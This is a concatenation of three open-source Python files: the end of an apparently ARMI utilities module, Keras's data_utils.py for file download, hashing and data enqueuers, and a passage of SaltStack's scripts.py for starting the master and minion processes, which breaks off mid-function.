if isinstance(x.stop, list):
jstop = [x + increment for x in x.stop]
else:
jstop = x.stop + increment
else:
jstop = None
jstep = x.step
return numpy.s_[jstart:jstop:jstep]
elif isinstance(x, numpy.ndarray):
return numpy.array([i + increment for i in x])
else:
raise Exception(
(
"It is not known how to handle x type: " "{0} in utils.convertToSlice"
).format(type(x))
)
def plotMatrix(
matrix,
fName,
minV=None,
maxV=None,
show=False,
title=None,
xlabel=None,
ylabel=None,
xticks=None,
yticks=None,
cmap=None,
figsize=None,
):
"""
Plots a matrix
"""
import matplotlib
import matplotlib.pyplot as plt
if figsize:
plt.figure(figsize=figsize) # dpi=300)
else:
plt.figure()
if cmap is None:
cmap = plt.cm.jet # @UndefinedVariable #pylint: disable=no-member
cmap.set_bad("w")
try:
matrix = matrix.todense()
except:
pass
if minV:
norm = matplotlib.colors.Normalize(minV, maxV)
else:
norm = None
if title is None:
title = fName
plt.imshow(
matrix, cmap=cmap, norm=norm, interpolation="nearest"
) # or bicubic or nearest#,vmin=0, vmax=300)
plt.colorbar()
plt.title(title)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
if xticks:
plt.xticks(*xticks, rotation=90)
if yticks:
plt.yticks(*yticks)
plt.grid()
plt.savefig(fName)
if show:
plt.show()
plt.close()
def userName() -> str:
"""
Return a database-friendly username.
This will return the current user's username, removing any prefix like ``pre-``, if
present.
Notes
-----
ARMI uses the user name in a number of places, namely in the database names, which
cannot contain hyphens.
"""
return re.sub("^[a-zA-Z]-", "", getpass.getuser())
def expandRepeatedFloats(repeatedList):
"""
Return an expanded repeat list.
Notes
-----
R char is valid for showing the number of repeats in MCNP. For examples the list:
[150, 200, '9R']
indicates a 150 day cycle followed by 10 200 day cycles.
"""
nonRepeatList = []
for val in repeatedList:
isRepeat = False
if isinstance(val, str):
val = val.upper()
if val.count("R") > 1:
raise ValueError("List had strings that were not repeats")
elif "R" in val:
val = val.replace("R", "")
isRepeat = True
if isRepeat:
nonRepeatList += [nonRepeatList[-1]] * int(val)
else:
nonRepeatList.append(float(val))
return nonRepeatList
def getStepsFromValues(values, prevValue=0.0):
"""Convert list of floats to list of steps between each float."""
steps = []
for val in values:
currentVal = float(val)
steps.append(currentVal - prevValue)
prevValue = currentVal
return steps
def average1DWithinTolerance(vals, tolerance=0.2):
"""
Compute the average of a series of arrays with a tolerance.
Tuned for averaging assembly meshes or block heights.
Parameters
----------
vals : 2D numpy.array
could be assembly x axial mesh tops or heights
"""
vals = numpy.array(vals)
filterOut = numpy.array([False]) # this gets discarded
while not filterOut.all(): # 20% difference is the default tolerance
avg = vals.mean(axis=0) # average over all columns
diff = abs(vals - avg) / avg # no nans, because all vals are non-zero
filterOut = (diff > tolerance).sum(
axis=1
) == 0 # True = 1, sum across axis means any height in assem is off
vals = vals[filterOut] # filter anything that is skewing
if vals.size == 0:
raise ValueError("Nothing was near the mean, there are no acceptable values!")
if (avg <= 0.0).any():
raise ValueError(
"A non-physical value (<=0) was computed, but this is not possible.\n"
"Values: {}\navg: {}".format(vals, avg)
)
return avg
def findNearestValue(searchList, searchValue):
"""Search a given list for the value that is closest to the given search value."""
return findNearestValueAndIndex(searchList, searchValue)[0]
def findNearestValueAndIndex(searchList, searchValue):
"""Search a given list for the value that is closest to the given search value. Return a tuple
containing the value and its index in the list."""
searchArray = numpy.array(searchList)
closestValueIndex = (numpy.abs(searchArray - searchValue)).argmin()
return searchArray[closestValueIndex], closestValueIndex
class MergeableDict(dict):
"""
Overrides python dictionary and implements a merge method.
Notes
-----
Allows multiple dictionaries to be combined in a single line
"""
def merge(self, *otherDictionaries) -> None:
for dictionary in otherDictionaries:
self.update(dictionary)
shutil_copy = shutil.copy
def safeCopy(src: str, dst: str) -> None:
"""This copy overwrites ``shutil.copy`` and checks that copy operation is truly completed before continuing."""
waitTime = 0.01 # 10 ms
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
srcSize = os.path.getsize(src)
shutil.copyfile(src, dst)
shutil.copymode(src, dst)
while True:
dstSize = os.path.getsize(dst)
if srcSize == dstSize:
break
time.sleep(waitTime)
runLog.extra("Copied {} -> {}".format(src, dst))
shutil.copy = safeCopy
|
data_utils.py
|
# Lint as python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
import tensorflow.compat.v2 as tf
from abc import abstractmethod
from contextlib import closing
import functools
import hashlib
import multiprocessing.dummy
import os
import pathlib
import queue
import random
import shutil
import tarfile
import threading
import time
import typing
import urllib
import weakref
import zipfile
from six.moves.urllib.parse import urlsplit
import numpy as np
from six.moves.urllib.request import urlopen
from keras.utils import tf_inspect
from keras.utils.generic_utils import Progbar
from keras.utils import io_utils
from tensorflow.python.util.tf_export import keras_export
# Required to support google internal urlretrieve
if True: # This gets transformed to `if sys.version_info[0] == 2:` in OSS. # pylint: disable=using-constant-test
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrieve` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Args:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once on establishment of
the network connection and once after each block read thereafter. The
hook will be passed three arguments; a count of blocks transferred so
far, a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from urllib.request import urlretrieve # pylint: disable=g-importing-member
def is_generator_or_sequence(x):
"""Check if `x` is a Keras generator type."""
builtin_iterators = (str, list, tuple, dict, set, frozenset)
if isinstance(x, (tf.Tensor, np.ndarray) + builtin_iterators):
return False
return (tf_inspect.isgenerator(x) or
isinstance(x, Sequence) or
isinstance(x, typing.Iterator))
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Args:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, str):
archive_format = [archive_format]
file_path = io_utils.path_to_string(file_path)
path = io_utils.path_to_string(path)
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@keras_export('keras.utils.get_file')
def get_file(fname=None,
origin=None,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Example:
```python
path_to_downloaded_file = tf.keras.utils.get_file(
"flower_photos",
"https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz",
untar=True)
```
Args:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location. If `None`, the
name of the file at `origin` will be used.
origin: Original URL of the file.
untar: Deprecated in favor of `extract` argument.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of `file_hash` argument.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are `'md5'`, `'sha256'`, and `'auto'`.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are `'auto'`, `'tar'`, `'zip'`, and `None`.
`'tar'` includes tar, tar.gz, and tar.bz files.
The default `'auto'` corresponds to `['tar', 'zip']`.
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the default directory `~/.keras/`.
Returns:
Path to the downloaded file
"""
if origin is None:
raise ValueError('Please specify the "origin" argument (URL of the file '
'to download).')
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
_makedirs_exist_ok(datadir)
fname = io_utils.path_to_string(fname)
if not fname:
fname = os.path.basename(urlsplit(origin).path)
if not fname:
raise ValueError(
f"Can't parse the file name from the origin provided: '{origin}'."
"Please specify the `fname` as the input param.")
if untar:
if fname.endswith('.tar.gz'):
fname = pathlib.Path(fname)
# The 2 `.with_suffix()` are because of `.tar.gz` as pathlib
# considers it as 2 suffixes.
fname = fname.with_suffix('').with_suffix('')
fname = str(fname)
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
io_utils.print_msg(
'A local file was found, but it seems to be '
f'incomplete or outdated because the {hash_algorithm} '
f'file hash does not match the original value of {file_hash} '
'so we will re-download the data.')
download = True
else:
download = True
if download:
io_utils.print_msg(f'Downloading data from {origin}')
class ProgressTracker:
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except urllib.error.HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except urllib.error.URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _makedirs_exist_ok(datadir):
os.makedirs(datadir, exist_ok=True) # pylint: disable=unexpected-keyword-arg
def _resolve_hasher(algorithm, file_hash=None):
"""Returns hash algorithm as hashlib function."""
if algorithm == 'sha256':
return hashlib.sha256()
if algorithm == 'auto' and file_hash is not None and len(file_hash) == 64:
return hashlib.sha256()
# This is used only for legacy purposes.
return hashlib.md5()
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
_hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Args:
fpath: path to the file being validated
algorithm: hash algorithm, one of `'auto'`, `'sha256'`, or `'md5'`.
The default `'auto'` detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if isinstance(algorithm, str):
hasher = _resolve_hasher(algorithm)
else:
hasher = algorithm
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Args:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
hasher = _resolve_hasher(algorithm, file_hash)
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class ThreadsafeIter:
"""Wrap an iterator with a lock and propagate exceptions to all threads."""
def __init__(self, it):
self.it = it
self.lock = threading.Lock()
# After a generator throws an exception all subsequent next() calls raise a
# StopIteration Exception. This, however, presents an issue when mixing
# generators and threading because it means the order of retrieval need not
# match the order in which the generator was called. This can make it appear
# that a generator exited normally when in fact the terminating exception is
# just in a different thread. In order to provide thread safety, once
# self.it has thrown an exception we continue to throw the same exception.
self._exception = None
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
with self.lock:
if self._exception:
raise self._exception # pylint: disable=raising-bad-type
try:
return next(self.it)
except Exception as e:
self._exception = e
raise
def threadsafe_generator(f):
@functools.wraps(f)
def g(*a, **kw):
return ThreadsafeIter(f(*a, **kw))
return g
@keras_export('keras.utils.Sequence')
class Sequence:
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
Notes:
`Sequence` are a safer way to do multiprocessing. This structure guarantees
that the network will only train once
on each sample per epoch which is not the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Args:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
def iter_sequence_infinite(seq):
"""Iterates indefinitely over a Sequence.
Args:
seq: `Sequence` instance.
Yields:
Batches of data from the `Sequence`.
"""
while True:
for item in seq:
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
# Because multiprocessing pools are inherently unsafe, starting from a clean
# state can be essential to avoiding deadlocks. In order to accomplish this, we
# need to be able to check on the status of Pools that we create.
_DATA_POOLS = weakref.WeakSet()
_WORKER_ID_QUEUE = None # Only created if needed.
_WORKER_IDS = set()
_FORCE_THREADPOOL = False
_FORCE_THREADPOOL_LOCK = threading.RLock()
def dont_use_multiprocessing_pool(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
with _FORCE_THREADPOOL_LOCK:
global _FORCE_THREADPOOL
old_force_threadpool, _FORCE_THREADPOOL = _FORCE_THREADPOOL, True
out = f(*args, **kwargs)
_FORCE_THREADPOOL = old_force_threadpool
return out
return wrapped
def get_pool_class(use_multiprocessing):
global _FORCE_THREADPOOL
if not use_multiprocessing or _FORCE_THREADPOOL:
return multiprocessing.dummy.Pool # ThreadPool
return multiprocessing.Pool
def get_worker_id_queue():
"""Lazily create the queue to track worker ids."""
global _WORKER_ID_QUEUE
if _WORKER_ID_QUEUE is None:
_WORKER_ID_QUEUE = multiprocessing.Queue()
return _WORKER_ID_QUEUE
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Args:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@keras_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer:
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Example:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
The `enqueuer.get()` should be an infinite stream of data.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Args:
workers: Number of workers.
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: get_pool_class(False)(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Sends current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Args:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
def __del__(self):
if self.is_running():
self.stop()
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
@keras_export('keras.utils.OrderedEnqueuer')
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Args:
sequence: A `tf.keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, None, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
try:
inputs = self.queue.get(block=True, timeout=5).get()
if self.is_running():
self.queue.task_done()
if inputs is not None:
yield inputs
except queue.Empty:
pass
except Exception as e: # pylint: disable=broad-except
self.stop()
raise e
def init_pool_generator(gens, random_seed=None, id_queue=None):
"""Initializer function for pool workers.
Args:
gens: State which should be made available to worker processes.
random_seed: An optional value with which to seed child processes.
id_queue: A multiprocessing Queue of worker ids. This is used to indicate
that a worker process was created by Keras and can be terminated using
the cleanup_all_keras_forkpools utility.
"""
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
worker_proc = multiprocessing.current_process()
# name isn't used for anything, but setting a more descriptive name is helpful
# when diagnosing orphaned processes.
worker_proc.name = 'Keras_worker_{}'.format(worker_proc.name)
if random_seed is not None:
np.random.seed(random_seed + worker_proc.ident)
if id_queue is not None:
# If a worker dies during init, the pool will just create a replacement.
id_queue.put(worker_proc.ident, block=True, timeout=0.1)
def next_sample(uid):
"""Gets the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
Args:
uid: int, generator identifier
Returns:
The next value of generator `uid`.
"""
return next(_SHARED_SEQUENCES[uid])
@keras_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Args:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(generator, use_multiprocessing)
self.random_seed = random_seed
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of works.
Returns:
A Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, self.random_seed, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
for f in last_ones:
f.wait()
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
'Your generator is NOT thread-safe. '
'Keras requires a thread-safe generator when '
'`use_multiprocessing=False, workers > 1`. ')
raise e
|
scripts.py
|
# -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import time
import signal
import logging
import functools
import threading
import traceback
import signal
import functools
from random import randint
# Import salt libs
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
import salt.ext.six as six
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def _handle_signals(client, signum, sigframe):
try:
# This raises AttributeError on Python 3.4 and 3.5 if there is no current exception.
# Ref: https://bugs.python.org/issue23003
trace = traceback.format_exc()
except AttributeError:
trace = ''
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
if signum == signal.SIGINT:
exit_msg = '\nExiting gracefully on Ctrl-c'
try:
jid = client.local_client.pub_data['jid']
exit_msg += (
'\n'
'This job\'s jid is: {0}\n'
'The minions may not have all finished running and any remaining '
'minions will return upon completion. To look up the return data '
'for this job later, run the following command:\n\n'
'salt-run jobs.lookup_jid {0}'.format(jid)
)
except (AttributeError, KeyError):
pass
else:
exit_msg = None
_handle_interrupt(
SystemExit(exit_msg),
Exception('\nExiting with hard crash on Ctrl-c'),
hardcrash, trace=trace)
def _install_signal_handlers(client):
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
def salt_master():
'''
Start the salt master.
'''
import salt.cli.daemons
# Fix for setuptools generated scripts, so that it will
# work with multiprocessing fork emulation.
# (see multiprocessing.forking.get_preparation_data())
if __name__ != '__main__':
sys.modules['__main__'] = sys.modules[__name__]
# REMOVEME after Python 2.7 support is dropped (also the six import)
if six.PY2:
from salt.utils.versions import warn_until
# Message borrowed from pip's deprecation warning
warn_until('Sodium',
'Python 2.7 will reach the end of its life on January 1st,'
' 2020. Please upgrade your Python as Python 2.7 won\'t be'
' maintained after that date. Salt will drop support for'
' Python 2.7 in the Sodium release or later.')
# END REMOVEME
master = salt.cli.daemons.Master()
master.start()
def minion_process():
'''
Start a minion process
'''
import salt.utils.platform
import salt.utils.process
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.process.appendproctitle('KeepAlive')
def handle_hup(manager, sig, frame):
manager.minion.reload()
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: small race issue where the parent PID could be replace
with another process with same PID!
'''
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.platform.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error('Minion process encountered exception: %s', exc)
os._exit(salt.defaults.exitcodes.EX_GENERIC)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
minion = salt.cli.daemons.Minion()
signal.signal(signal.SIGHUP,
functools.partial(handle_hup,
minion))
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
lock.acquire(blocking=True)
log.warning('Fatal functionality error caught by minion handler:\n', exc_info=True)
log.warning('** Restarting minion **')
delay = 60
if minion is not None and hasattr(minion, 'config'):
delay = minion.config.get('random_reauth_delay', 60)
delay = randint(1, delay)
log.info('waiting random_reauth_delay %ss', delay)
time.sleep(delay)
sys.exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
finally:
lock.acquire(blocking=True)
def salt_minion():
'''
Start the salt minion in a subprocess.
Auto restart minion on error.
'''
import signal
import salt.utils.platform
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
import multiprocessing
# Fix for setuptools generated scripts, so that it will
# work with multiprocessing fork emulation.
# (see multiprocessing.forking.get_preparation_data())
if __name__ != '__main__':
sys.modules['__main__'] = sys.modules[__name__]
if '' in sys.path:
sys.path.remove('')
if salt.utils.platform.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
# REMOVEME after Python 2.7 support is dropped (also the six import)
elif six.PY2:
from salt.utils.versions import warn_until
# Message borrowed from pip's deprecation warning
warn_until('Sodium',
'Python 2.7 will reach the end of its life on January 1st,'
' 2020. Please upgrade your Python as Python 2.7 won\'t be'
' maintained after that date. Salt will drop support for'
' Python 2.7 in the Sodium release or later.')
# END REMOVEME
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(pid, signum, sigframe): # pylint: disable=unused-argument
'''
